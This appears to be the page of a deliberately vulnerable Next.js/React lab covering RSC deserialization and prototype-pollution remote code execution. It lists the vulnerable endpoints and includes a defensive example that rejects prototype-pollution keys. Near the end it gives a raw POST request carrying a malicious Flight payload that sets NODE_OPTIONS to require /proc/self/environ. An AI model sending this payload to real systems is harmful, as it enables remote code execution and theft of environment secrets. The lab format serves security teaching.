⚠️ VULNERABLE LAB ENVIRONMENT ⚠️

CVE-2025-55182 & CVE-2025-66478 - React Server Components RCE

Next.js 15.1.0 (Vulnerable) | React 19.0.0 (Vulnerable)

🔬 Lab Information

Vulnerability Details

  • CVE-2025-55182: React Server Components - Insecure Deserialization
  • CVE-2025-66478: Next.js - Prototype Pollution in requireModule
  • CVSS Score: 10.0 (Critical)
  • Attack Vector: Network (No authentication required)

Server Information (Exposed via RSC)

{
  "hostname": "localhost",
  "nodeVersion": "v20.19.6",
  "platform": "linux"
}

📡 React Server Components Demo

These components use the RSC Flight protocol - the vulnerable deserialization mechanism

👥 Server-Side User Data (RSC)

This data is fetched and rendered on the server, then streamed to the client via the Flight protocol.

ID | Name         | Email                      | Role
---|--------------|----------------------------|--------------
1  | Admin User   | admin@vulnerable-lab.local | administrator
2  | Regular User | user@vulnerable-lab.local  | user

🛒 Product Catalog (Server Component)

Products are loaded server-side. Form submissions use Server Actions (also vulnerable).

Product                       | ID       | Price   | Availability
------------------------------|----------|---------|-------------
Security Scanner Pro          | PROD-001 | $299.99 | In Stock
Vulnerability Assessment Tool | PROD-002 | $599.99 | In Stock
Penetration Testing Suite     | PROD-003 | $999.99 | Out of Stock
Network Monitor               | PROD-004 | $199.99 | In Stock

⚠️ Server Action Vulnerability:

The form above uses a Server Action. When submitted, the data is serialized using the Flight protocol and sent to the server for processing. This deserialization point is vulnerable to CVE-2025-55182.

⚠️ Vulnerability Demonstration Points

  1. RSC Payload Endpoint: /_next/static/chunks/app/page.js
  2. Flight Protocol Stream: The RSC responses contain serialized React components
  3. Deserialization Point: The server deserializes client-sent Flight payloads without proper validation
  4. Prototype Pollution: The requireModule function does not check for __proto__ access
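The two weaknesses listed in points 3 and 4 share one defensive fix: reject prototype-pollution keys in any client-supplied JSON before it reaches a deserializer, and resolve module references only through an allowlist. The block below is an added example written for this lab page; it is not code from Next.js, React, or the lab itself. The payload shape, the module ids in KNOWN_MODULES, and the function names are assumptions made for illustration, and the sample inputs in the usage section are constructed.

```javascript
// Added example (not from the lab page, Next.js or React): a defensive walk
// over a JSON-decoded payload that rejects keys usable for prototype
// pollution before the object reaches any deserializer or module resolver.
const POLLUTION_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// Returns the JSON path of the first dangerous key, or null if the payload is clean.
function findPollutionKey(value, path = "$") {
  if (Array.isArray(value)) {
    for (let i = 0; i < value.length; i++) {
      const hit = findPollutionKey(value[i], `${path}[${i}]`);
      if (hit) return hit;
    }
    return null;
  }
  if (value !== null && typeof value === "object") {
    // Object.keys sees the own "__proto__" property that JSON.parse creates;
    // a check against the prototype chain (e.g. `"__proto__" in obj`) would
    // be true for every object and is therefore useless here.
    for (const key of Object.keys(value)) {
      if (POLLUTION_KEYS.has(key)) return `${path}.${key}`;
      const hit = findPollutionKey(value[key], `${path}.${key}`);
      if (hit) return hit;
    }
  }
  return null;
}

// Parse a raw request body and refuse it if it carries a pollution key.
// Throws on malformed JSON or on a rejected key; returns the parsed value otherwise.
function parseUntrustedPayload(rawBody) {
  const parsed = JSON.parse(rawBody);
  const hit = findPollutionKey(parsed);
  if (hit) throw new Error(`rejected payload: prototype-pollution key at ${hit}`);
  return parsed;
}

// Module references in a Flight-style payload name a chunk/module id. Resolving
// them through a fixed allowlist (ids below are constructed for this example)
// means an attacker-chosen string never reaches the module loader.
const KNOWN_MODULES = new Set(["app/page", "app/layout"]);

function resolveModuleId(id) {
  if (typeof id !== "string" || !KNOWN_MODULES.has(id)) {
    throw new Error(`rejected module reference: ${JSON.stringify(id)}`);
  }
  return id;
}

// Usage with constructed inputs: a clean payload passes, a nested
// "__proto__" key is located and rejected.
const clean = parseUntrustedPayload('{"user":{"name":"demo"},"items":[1,2]}');
console.log("clean payload keys:", Object.keys(clean));
try {
  parseUntrustedPayload('{"x":{"__proto__":{"polluted":true}}}');
} catch (e) {
  console.log(e.message); // rejected payload: prototype-pollution key at $.x.__proto__
}
console.log(resolveModuleId("app/page"));
```

The walk deliberately reports the first offending path instead of silently stripping the key: a stripped payload would still be processed, while a rejected one produces a log line that a detection rule can key on.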

🎯 Attack Surface

Send malicious Flight payload to trigger RCE:

POST / HTTP/1.1
Content-Type: text/x-component

0:["$","$L1",null,{"__proto__":{"constructor":{"prototype":{"env":{"NODE_OPTIONS":"--require /proc/self/environ"}}}}}]

📚 Learning Objectives